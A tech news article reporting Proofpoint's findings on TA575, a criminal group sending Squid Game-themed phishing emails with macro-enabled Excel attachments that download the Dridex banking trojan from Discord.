Cyber criminals using Squid Game to distribute malware — Proofpoint

The Dridex malware being distributed by TA575 was found by Proofpoint to be distributed via emails with subject lines relating to Squid Game, such as:

  • Squid Game is back, watch new season before anyone else.
  • Invite for Customer to access the new sesason. [sic]
  • Squid game new season commercials casting preview
  • Get early access Squid Game season 2.
A screenshot of an email distributed by TA575, inviting the target to receive early access to Season 2 of Squid Game.
The malware-laced emails were found by Proofpoint to be from TA575, a cyber criminal organisation that’s been active for at least four years.

The emails tell targets, which were based all industries primarily in the United States, to fill out either an attached document to get early access to the new season of the show, or a talent form to become part of the background casting.

The attachments are Excel documents with macros that, if enabled, will download the Dridex banking trojan affiliate id “22203” from Discord URLs.

A screenshot of an excel document with the 'Netflix' logo inserted, which was distributed by TA575.
One of the Excel documents found by Proofpoint, that were distributed by TA575.

Dridex is a banking trojan distributed by multiple affiliates, including TA575, that can lead to data theft and installation of follow-on malware such as ransomware.

Cyber criminals are targeting the cloud — here’s how to defend against them

Paul Mansfield, cyber threat intelligence lead analyst at Accenture, discusses how to combat the rise in cyber criminals targeting the cloud. Read here

“TA575 is a Dridex affiliate tracked by Proofpoint since late 2020,” said Proofpoint analysts Axel F and Selena Larson, in the company’s blog post.

“This group distributes malware via malicious URLs, Microsoft Office attachments, and password-protected files. On average, TA575 sends thousands of emails per campaign impacting hundreds of organisations.

“TA575 also uses the Discord content delivery network (CDN) to host and distribute Dridex. Discord, a communications platform with consumer and enterprise uses, is an increasingly popular malware hosting service for cyber criminals.”

Avatar photo

Aaron Hurst

Aaron Hurst is Information Age's senior reporter, providing news and features around the hottest trends across the tech industry.